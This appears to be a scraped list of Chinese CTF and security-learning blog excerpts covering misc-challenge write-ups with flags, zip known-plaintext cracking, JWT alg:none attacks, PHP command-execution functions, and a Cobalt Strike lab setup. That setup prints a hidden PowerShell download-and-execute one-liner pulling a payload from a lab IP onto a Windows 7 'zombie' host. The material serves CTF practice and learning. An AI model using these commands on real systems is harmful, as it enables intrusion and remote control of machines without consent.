miscSign随波逐流一把梭,base16解密
WuCup{df357d47-31cb-42a8-aa0c-6430634ddf4a}
原神启动!stegsolve查看通道,在red plane里发现密码:WuCup{7c16e21c-31c2-439e-a814-bba2ca54101a}
word改后缀为zip,在word/media里找到图片
放大看,图片很模糊,但是也看得出为:WuCup{6bb9d97d-7169-434b-a7cf-0ee0b6fdfa30}
这是img的密码,test里的密码在document.xml里,密码为WuCup{f848566c-3fb6-4bfd-805a-d9e102511784}
WuCup{0e49b776-b732-4242-b91c-8c513a1f12ce}
太极题目:
太极生两仪-两仪生四象-四象生八卦-八卦定吉凶-吉凶生大业
根据提示:tai ji sheng liang yi 分别取1 2 3 4 5的字母,即t i e n y
liang yi sheng si xiang 同理可得是l i e i ...
secrect.zip解题思路:明文攻击->字频统计
hint提示:软件:7-zip
我还是试试了bandzip,2345压缩,其实还是不行,使用360压缩即可,7-zip应该也行,不过没下,桀桀桀
解压之后为1.txt进行字频统计即可
flag{EdCvGyTr@95173}
明文攻击文件较大时,鉴于ARCHPR爆破时间一般不低于20分钟,所以一般不采用它进行明文攻击爆破
进行明文攻击时需要注意压缩算法不同,也会造成爆破失败
第二种解法:bkcrack进行爆破
bkcrack用法:
bkcrack -L 1.zip //列出条目名称和数据bkcrack -L E:\misc工具\bkcrack-1.6.1-win64\小明的日记本.zip
bkcrack解出密钥:
bkcrack -C E:\misc工具\bkcrack-1.6.1-win64\小明的日记本.zip -c d.jpg -P d.zip -p d.jpg
因此可以得出密钥是:de7fb7fe a8c68ae2 ddc4ba4b
到这里一般2步可以用ARCHPR来解,也可以用bkcrack来解,使用 ...
ez_jpgbase64解密,发现16进制逆序
jpg宽高修改,这里修改宽将02 80 02 20 改为02 80 02 80即可
舔狗的觉醒8位数字爆破
相邻的字节反转
with open("byte-revenge.txt", "r") as f: data = f.read().split()result =""for i in data: res = i[::-1] result += resprint(result)swapped_data = [byte[::-1] for byte in data]with open("1.txt", "w") as f: f.write("".join(result))
保存为1.zip,打开之后有一个pdf文件,pdf转ppt移动图片即可
Sercet Of StarvenNTLM协议
NTML 全称 New Technology LAN Manager,是微软提供的一组安全协议, ...
miscmisc1考察知识点:word隐写
wps打开,ctrl+A全选,调换颜色即可
flag{HNCTF9090AS9nbg87600hn77hn88}
misc2考察知识点
编码1:BrainFuck解码
编码2:JSFuck编码
编码3:ook解密
在线网址:[Brainfuck/Ook! Obfuscation/Encoding splitbrain.org]
misc3分组字节流搜索flag,我们可以发现在长度为337,349,85的包里搜索到flag
提取其16进制,保存为压缩包,打开我们可以发现flag.txt和key
flag:
10004583275926070044326083910251708233320797779355779208703097816305188140191914132269450797
4e94dcdb6de87e65d263419ec45aec93e8a2e1d386b31fb804e0f02366df44dbe86a8a7c462d
key
521629469521182029380624702988702 ...
JWT漏洞分析JWT认证攻击详细解答:https://www.cnblogs.com/backlion/p/16699442.html
在线利用工具:https://jwt.io/
jwt工具:https://github.com/ticarpi/jwt_tool
基础使用:python3 jwt_tool.py jwt
要运行特定类型的漏洞利用,您需要选择 eXploit (-X) 选项并选择漏洞(此处使用“a”表示alg:none漏洞利用):
python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw -X a
1.JWT的简介JWT全称为json web token 将json对象作为载体进行传输信息,通常用于身份认证和信息交换。JWT可以使用密钥(HMAC算法)或者使用RSA或ECDSA的公钥/私钥对自身进行签名
2:JWT的格式每当用户访问站点中的资源时,对应的请求头 ...
cobaltStrike4.3安装哎,装个4.0的版本还是不行,jdk版本是11的
百度网盘:https://pan.baidu.com/s/1XOSL8o4hotOIJm1u9Raq9w 提取码: n1qm
kali里面解压缩:
sudo ./teamserver 192.168.23.152 123456 #kali的ip地址,密码:123456[一次性的,可以随时更改]
windows下启动
成功连接
cobaltStrike基本使用准备一台肉鸡,这里我使用windows7来测试,哎,windows10好卡
cs上
填写主机的ip地址,开启监听即可
window7上输入
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.5.48:80/a'))"
连接成功,输入shell whoami来执行一下
使用CS进行本地工作组收集信息Shell ipconfig,可以查看到其ip地址 ...
miscez_cryptoqMfZzunurNTuAdfZxZfZxZrUx2v6x2i0C2u2ngrLyZbKzx0=
base64换表
黑丝上的flagstegsolve查看通道
这是一个压缩包压缩包爆破解密,注释里的一段base解密:
QmFzZUNURj8/Pz8/P0ZUQ2VzYUI=
BaseCTF??????FTCesaB
ARCHPR爆破无解,经观察可知这个密码呈对称性
脚本直接爆破解密
lowercase = 'abcdefghijklmnopqrstuvwxyz'uppercase = lowercase.upper()digits = '0123456789'symbols = '!@#$%^&*()-_=+'ls = lowercase+uppercase+digits+symbolswith open('passwd.txt','w') as f: for t1 in ls: for t2 in ...
解不开的压缩包题目有点意思,999层压缩包,也就是点999下,直接使用脚本解压吧
import zipfileimport osdef extract_zip(zip_file, extract_to): try: with zipfile.ZipFile(zip_file, 'r') as zip_ref: zip_ref.extractall(extract_to) return True except Exception as e: print(f"Error extracting {zip_file}: {e}") return Falsedef extract_all(zip_file, output_dir): if not os.path.exists(output_dir): os.makedirs(output_dir) success = extract_zip(zip_f ...
前言之前一直想xshell连接我的kali,可以减少一些麻烦事,结果一直本地ping不同我的虚拟机ip,虽然我使用的是net模式,但是我虚拟机网卡vm8都没有,我也是服了,就是之前我安装的硬盘报废了,vm虚拟机没删除干净,这里可以重新安装vm虚拟机
推荐博客:如何彻底删除vm虚拟机
https://blog.csdn.net/Wysnbb/article/details/123996480
博客挺好的,严格按照上面来没有问题,细节问题可以看看评论
这里使用桥接模式来
查看一下我们的wifi连接RZ608啥的,记住这个称号(之前是没有vm1和8的)
查看主机的ip(网段是192.168.5.0)
root下开启
vim /etc/network/interfaces
这里的address,网关和掩码都设置成一个分段的,修改完成后:wq保存,然后重启网卡
systemctl restart networking
查看我们虚拟机ip:192.168.5.76
ping一下,是连接成功的
本地ping一下
xshell输入ip,账号,密码连接上了,呜呜呜,太难了
终于还是做 ...
常见危险函数systemsystem()函数可以执行系统命令, 并将命令执行的结果直接输出到界面中, 使用时直接在参数中传入需要执行的命令即可
Passthrupassthru()函数可以执行系统命令, 并将执行结果输出到页面中, 与system()函数不同的是, 它支持二进制的数据, 更多的用于文件, 图片等操作, 使用时直接在参数中传递字符串类型的系统命令即可
shell_execshell_exec()函数可以执行系统命令, 但它不会直接输出执行的结果, 而是返回一个字符串类型的变量来存储系统命令的执行结果, 在参数中传递需要执行的系统命令即可
反引号反引号可以执行系统命令, 但它不会输出结果, 而是返回一个字符串类型的变量, 用来存储系统命令的执行结果, 可单独使用, 也可配合其他命令执行函数使用来绕过参数中的过滤条件
popenpopen()函数可以执行系统命令, 但不会输出执行的结果, 而是返回一个资源类型的变量用来存储系统命令的执行结果, 需要配合fread()函数来读取命令的执行结果
proc_openproc_open — 执行一个命令,并且打开用来输入/输 ...